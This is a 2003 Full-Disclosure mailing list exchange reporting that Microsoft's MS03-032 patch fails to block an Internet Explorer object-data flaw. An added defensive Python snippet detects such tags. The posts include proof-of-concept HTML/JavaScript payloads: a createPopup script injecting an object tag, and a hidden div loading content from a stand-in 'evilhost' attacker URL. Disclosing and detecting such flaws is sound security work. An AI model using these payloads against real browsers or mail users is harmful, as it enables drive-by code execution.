----- Original Message ----- 
From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Sunday, September 07, 2003 6:17 AM
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032


> 
> 
> Since the cat somehow got out of the bag, and more importantly, this 
> is so blatantly obvious, herewith is the "Bad News":
> 
> The patch for Drew's object data=funky.hta doesn't work:
> 
> http://www.malware.com/badnews.html
> 
> <script>
>   var oPopup = window.createPopup();
> 
>   function showPopup() {
>     oPopup.document.body.innerHTML = "<object data=ouch.php>";
>     oPopup.show(0,0,1,1,document.body);
>   }
>   
>   showPopup()
> </script>

this works too...

<div style="display.none"><object data="http://evilhost/realbad.asp";>
</object>oh</div>

beware the mail... 
                            and the rewtXSS skillz


Donnie Werner
[EMAIL PROTECTED]
http://exploitlabs.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
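
An added example, not part of the original thread: a filter-side check that reports every `<object>` element carrying a `data` attribute, whether it appears as literal markup or inside script text assigned to `innerHTML`, the two forms shown in the messages above. The function names and sample inputs are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Finds "<object ... data=VALUE" in script text, e.g. markup assigned to innerHTML.
OBJECT_DATA_RE = re.compile(
    r"<\s*object\b[^>]*\bdata\s*=\s*[\"']?([^\s\"'>]+)", re.I)


class ObjectDataFinder(HTMLParser):
    """Collects (where, data_value) for every <object data=...> seen."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag == "object":
            data = dict(attrs).get("data")
            if data:
                self.findings.append(("markup", data))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, text):
        # Script bodies are opaque to the HTML parser, so scan them as text.
        if self._in_script:
            for match in OBJECT_DATA_RE.finditer(text):
                self.findings.append(("script-string", match.group(1)))


def find_object_data(html):
    """Return a list of (location, data attribute value) findings."""
    finder = ObjectDataFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed samples mirroring the two forms posted in the thread.
SAMPLE_SCRIPT = ('<script>var p = window.createPopup(); '
                 'p.document.body.innerHTML = "<object data=ouch.php>";</script>')
SAMPLE_MARKUP = ('<div style="display:none">'
                 '<object data="http://filter-test.invalid/x.asp"></object>oh</div>')
SAMPLE_BENIGN = '<p>hello</p><object classid="x"></object>'
```

A finding is a reason to strip the element or quarantine the message, not proof of compromise. Script that assembles the tag from concatenated fragments will not match this pattern.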
